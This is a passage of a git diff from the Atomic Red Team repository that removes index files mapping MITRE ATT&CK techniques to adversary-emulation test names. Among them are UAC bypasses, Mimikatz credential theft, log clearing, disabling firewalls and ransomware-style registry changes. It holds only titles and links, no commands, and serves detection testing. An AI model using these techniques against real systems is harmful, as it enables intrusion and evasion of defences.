- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
-1746
View File
@@ -1,1746 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.011 Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 execute VBscript command using Ordinal number [windows]
- Atomic Test #4: Rundll32 advpack.dll Execution [windows]
- Atomic Test #5: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #6: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #7: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #8: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #9: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #10: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #11: Rundll32 with Ordinal Value [windows]
- Atomic Test #12: Rundll32 with Control_RunDLL [windows]
- Atomic Test #13: Rundll32 with desk.cpl [windows]
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- Atomic Test #4: Create and Hide a Service with sc.exe [windows]
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1218.004 Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
- Atomic Test #3: InstallUtil class constructor method call [windows]
- Atomic Test #4: InstallUtil Install method call [windows]
- Atomic Test #5: InstallUtil Uninstall method call - /U variant [windows]
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
- Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
- Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #1: Windows Disable LSA Protection [windows]
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #3: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #4: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #5: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #6: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #7: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- Atomic Test #8: DiskShadow Command Execution [windows]
- Atomic Test #9: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
- Atomic Test #10: Lolbin Gpscript logon option [windows]
- Atomic Test #11: Lolbin Gpscript startup option [windows]
- Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- [T1620 Reflective Code Loading](../../T1620/T1620.md)
- Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.003 Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- [T1562.002 Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
- Atomic Test #3: Impair Windows Audit Log Policy [windows]
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- Atomic Test #5: Disable Event Logging with wevtutil [windows]
- Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
- [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable Microsoft Defender Firewall [windows]
- Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #16: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
- Atomic Test #17: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
- Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
- Atomic Test #9: Disable Windows Registry Tool [windows]
- Atomic Test #10: Disable Windows CMD application [windows]
- Atomic Test #11: Disable Windows Task Manager application [windows]
- Atomic Test #12: Disable Windows Notification Center [windows]
- Atomic Test #13: Disable Windows Shutdown Button [windows]
- Atomic Test #14: Disable Windows LogOff Button [windows]
- Atomic Test #15: Disable Windows Change Password Feature [windows]
- Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
- Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
- Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
- Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
- Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
- Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
- Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
- Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
- Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
- Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
- Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
- Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
- Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
- Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
- Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
- Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
- Atomic Test #32: Windows Powershell Logging Disabled [windows]
- Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
- Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
- Atomic Test #35: Disable Windows Toast Notifications [windows]
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
- Atomic Test #39: NetWire RAT Registry Key Creation [windows]
- Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
- Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
- Atomic Test #42: Disable Windows Error Reporting Settings [windows]
- Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
- Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.001 Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #4: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #5: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- Atomic Test #6: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
- Atomic Test #7: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
